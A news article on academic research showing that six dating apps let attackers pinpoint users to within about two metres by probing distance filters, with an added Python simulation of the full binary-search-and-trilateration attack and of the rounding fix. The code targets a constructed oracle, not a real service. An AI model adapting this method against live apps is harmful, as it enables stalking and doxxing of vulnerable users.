6 popular dating apps are exposing accurate user locations

Vulnerabilities in six dating apps, including Bumble, Hinge, Badoo, Grindr, Happn, and Hily, could allow malicious users to pinpoint locations within two meters of their targets — a doxxing nightmare

Researchers from KU Leuven, a prominent Belgian university, scrutinised 15 well-known dating apps and uncovered flaws in several of them. Although none of the apps explicitly shares a user's precise location, the researchers found that the 'filters' feature, used to refine search results by age, height, relationship type and distance, was being evaluated against users' exact coordinates, so the filter's yes-or-no answer leaks information about them.

The technique, dubbed ‘oracle trilateration’ by the researchers, builds on the principles of trilateration used in GPS technology. The process begins with the attacker roughly estimating the victim’s location based on the profile information.

The attacker then gathers three precise distances by methodically adjusting the distance filter and observing the exact radius at which the victim drops out of the results; because the filter is applied to exact coordinates, that boundary is the true distance. Repeating the measurement from three vantage points yields three circles around the attacker's positions whose intersection reveals the victim's location.

“It was somewhat surprising that known issues were still present in these popular apps,” researcher Karel Dhondt told TechCrunch. Although the exact coordinates were not revealed, the precision of two meters is “close enough to pinpoint the user”.

The positive news is that all affected apps have since updated their distance-filter functionality to mitigate the risk. Rounding a user's coordinates to three decimal places before the filter is applied reduces the precision; the researchers put the resulting uncertainty at approximately one kilometre. (For scale, a thousandth of a degree of latitude is roughly 111 metres, so the uncertainty a given app actually achieves depends on exactly how it rounds.)

This modification significantly hampers the oracle trilateration technique, since the oracle can then only reveal which grid point the victim's position has been snapped to, not the position itself. Bumble addressed the vulnerability in 2023, while Hily and Badoo collaborated with the researchers to implement new geocoding algorithms, eliminating the flaw.
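The simulation below is an added example, not code from the KU Leuven study or from any of the apps, and it walks through the whole procedure end to end: a server-side distance filter modelled as a yes/no oracle, a binary search on the filter radius that recovers an exact distance from each of three spoofed positions, and a planar trilateration of the three resulting circles. It also shows the mitigation: when the same oracle is run against coordinates rounded to three decimal places, the attack still converges, but only on the rounded grid point. The victim's location, the rough starting guess, the probe geometry and the `DistanceFilterOracle` class are all constructed assumptions; a real attacker would drive the app's API with a spoofed device location.

```python
"""Simulated oracle trilateration against a dating app's distance filter.

Added example, not code from the KU Leuven study or from any of the apps.
The victim position, the rough guess and the oracle are constructed
assumptions; a real attack drives the app's API with a spoofed location.
"""
import math

EARTH_RADIUS_M = 6_371_000.0
M_PER_DEG = EARTH_RADIUS_M * math.pi / 180  # ~111,195 m per degree of latitude

# Constructed victim location (somewhere in Brussels), 5-decimal precision.
VICTIM = (50.85037, 4.35171)
# Constructed rough guess, e.g. from "lives in Brussels" in the profile text.
ROUGH_GUESS = (50.8500, 4.3500)


def haversine_m(a, b):
    """Great-circle distance in metres between two (lat, lon) points."""
    lat1, lon1, lat2, lon2 = map(math.radians, (*a, *b))
    h = (math.sin((lat2 - lat1) / 2) ** 2
         + math.cos(lat1) * math.cos(lat2) * math.sin((lon2 - lon1) / 2) ** 2)
    return 2 * EARTH_RADIUS_M * math.asin(math.sqrt(h))


def round_coords(pos, decimals):
    """Snap a (lat, lon) pair to a grid before it is ever used in a filter."""
    return (round(pos[0], decimals), round(pos[1], decimals))


class DistanceFilterOracle:
    """Models the server-side 'within X metres' filter that leaks the answer.

    decimals=None compares against exact coordinates (the vulnerable
    behaviour); decimals=3 compares against a rounded position, the class
    of fix the article describes.
    """

    def __init__(self, victim, decimals=None):
        self.stored = victim if decimals is None else round_coords(victim, decimals)
        self.queries = 0

    def victim_visible(self, attacker_pos, radius_m):
        self.queries += 1
        return haversine_m(attacker_pos, self.stored) <= radius_m


def measure_distance(oracle, attacker_pos, max_radius_m=5_000.0, tol_m=0.1):
    """Binary-search the filter radius for the point where the victim just
    drops out of the results; that boundary is the exact distance."""
    lo, hi = 0.0, max_radius_m
    assert oracle.victim_visible(attacker_pos, hi), "widen max_radius_m"
    while hi - lo > tol_m:
        mid = (lo + hi) / 2
        if oracle.victim_visible(attacker_pos, mid):
            hi = mid  # still visible: true distance is <= mid
        else:
            lo = mid  # filtered out: true distance is > mid
    return (lo + hi) / 2


def to_local_xy(pos, origin):
    """Flat-earth metres east/north of `origin`; adequate within a few km."""
    return ((pos[1] - origin[1]) * M_PER_DEG * math.cos(math.radians(origin[0])),
            (pos[0] - origin[0]) * M_PER_DEG)


def from_local_xy(xy, origin):
    return (origin[0] + xy[1] / M_PER_DEG,
            origin[1] + xy[0] / (M_PER_DEG * math.cos(math.radians(origin[0]))))


def trilaterate(centers_xy, radii):
    """Intersect three circles: subtracting the first circle equation from the
    other two leaves a 2x2 linear system, solved here with Cramer's rule."""
    (x1, y1), (x2, y2), (x3, y3) = centers_xy
    r1, r2, r3 = radii
    a1, b1 = 2 * (x2 - x1), 2 * (y2 - y1)
    c1 = r1**2 - r2**2 + x2**2 - x1**2 + y2**2 - y1**2
    a2, b2 = 2 * (x3 - x1), 2 * (y3 - y1)
    c2 = r1**2 - r3**2 + x3**2 - x1**2 + y3**2 - y1**2
    det = a1 * b2 - a2 * b1
    return ((c1 * b2 - c2 * b1) / det, (a1 * c2 - a2 * c1) / det)


def locate_victim(oracle, rough_guess, probe_radius_m=400.0):
    """Full attack: spoof three positions around the rough guess, measure the
    distance from each through the oracle, then trilaterate."""
    centers, radii = [], []
    for bearing_deg in (0, 120, 240):
        xy = (probe_radius_m * math.sin(math.radians(bearing_deg)),
              probe_radius_m * math.cos(math.radians(bearing_deg)))
        probe = from_local_xy(xy, rough_guess)
        centers.append(to_local_xy(probe, rough_guess))
        radii.append(measure_distance(oracle, probe))
    return from_local_xy(trilaterate(centers, radii), rough_guess)


def attack_error_m(decimals=None):
    """Distance between the victim's true position and the attacker's result."""
    oracle = DistanceFilterOracle(VICTIM, decimals)
    return haversine_m(VICTIM, locate_victim(oracle, ROUGH_GUESS))


if __name__ == "__main__":
    print(f"exact coordinates : error {attack_error_m():.2f} m")
    print(f"3-decimal rounding: error {attack_error_m(3):.1f} m")
```

Running the script prints the positioning error in both settings. With exact coordinates the attacker lands within a fraction of a metre after 17 oracle queries per probe (an idealised bound; the researchers reported two metres against live apps). With three-decimal rounding the attack still converges, to within a metre of the rounded grid point, but that point is about 46 metres from the victim here, and at this latitude the snapping error can reach roughly 65 metres. In other words, rounding does not stop the oracle from answering, it only caps what the answer is worth, so the decimal place chosen decides the residual uncertainty.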

Grindr, another app scrutinised in the study, had a less severe vulnerability, limiting location accuracy to within 111 metres (the size of a one-thousandth-of-a-degree step in latitude). While this is an improvement, it still poses risks, particularly in densely populated areas. The platform defended the feature as necessary for connecting its users within the LGBTQ+ community, emphasising that users control their location information.

“The apps’ privacy policies generally fail to inform users about these privacy threats and leave the burden of protecting personal (sensitive) data to the users,” the researchers concluded. “We hope that the awareness that we bring to these issues will lead LBD providers to reconsider their data gathering practices, protect their APIs from a data leak, prevent location inference, and give users control of their data and therefore ultimately their privacy.”

Kumar Hemant

Deputy Editor at Candid.Technology. Hemant writes at the intersection of tech and culture and has a keen interest in science, social issues and international relations. You can contact him here: kumarhemant@pm.me